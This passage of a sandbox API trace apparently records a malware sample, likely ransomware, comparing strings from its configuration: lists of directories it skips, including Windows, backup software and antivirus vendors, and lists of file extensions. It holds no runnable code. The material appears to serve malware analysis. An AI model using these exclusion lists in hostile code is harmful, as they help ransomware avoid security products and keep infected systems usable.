lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACRONIS\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUPCLIENT\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUP MANAGER\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CARBONITE\\", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT ONEDRIVE\\", cchCount1=20, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GOOGLE\\DRIVE\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DROPBOX\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACROBAT READER", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NVIDIA", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.564] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKYLAB", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVDEFENDER", cchCount1=11, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SOPHOS", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.565] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACRONIS\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUPCLIENT\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUP MANAGER\\", cchCount1=16, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CARBONITE\\", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.566] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT ONEDRIVE\\", cchCount1=20, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GOOGLE\\DRIVE\\", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DROPBOX\\", cchCount1=9, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACROBAT READER", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NVIDIA", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BITDEFENDER", cchCount1=12, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PANDA SECURITY", cchCount1=15, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MCAFEE", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKY LAB", cchCount1=14, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KASPERSKYLAB", cchCount1=13, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVDEFENDER", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SOPHOS", cchCount1=7, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVG", cchCount1=4, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[FEX_START]", cchCount2=11) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[FEX_START]", cchCount1=11, lpString2="[FEX_START]", cchCount2=11) returned 2 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS.OLD\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS10UPGRADE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\$RECYCLE.BIN\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS NT\\", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\COMMON FILES\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACRONIS\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUPCLIENT\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BACKUP MANAGER\\", cchCount1=16, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CARBONITE\\", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\INTERNET EXPLORER\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSPOWERSHELL\\", cchCount1=19, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS DEFENDER\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DVD MAKER\\", cchCount1=11, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ASPNET_CLIENT\\", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\REFERENCE ASSEMBLIES\\", cchCount1=22, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT OFFICE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS SIDEBAR\\", cchCount1=17, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS MEDIA PLAYER\\", cchCount1=22, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\OFFICE\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT ONEDRIVE\\", cchCount1=20, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GOOGLE\\DRIVE\\", cchCount1=14, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DROPBOX\\", cchCount1=9, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\PROVISIONING\\", cchCount1=24, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT SILVERLIGHT\\", cchCount1=23, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\MICROSOFT\\", cchCount1=23, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MICROSOFT\\CRYPTO\\", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWSAPPS\\", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ACROBAT READER", cchCount1=15, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NVIDIA", cchCount1=7, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7-ZIP\\", cchCount1=7, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINRAR\\", cchCount1=8, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ESET", cchCount1=5, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AVAST", cchCount1=6, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MALWAREBYTES", cchCount1=13, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SYMANTEC ENDPOINT", cchCount1=18, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TREND MICRO", cchCount1=12, lpString2="[FEX_END]", cchCount2=9) returned 3 [0086.571] CompareStringW 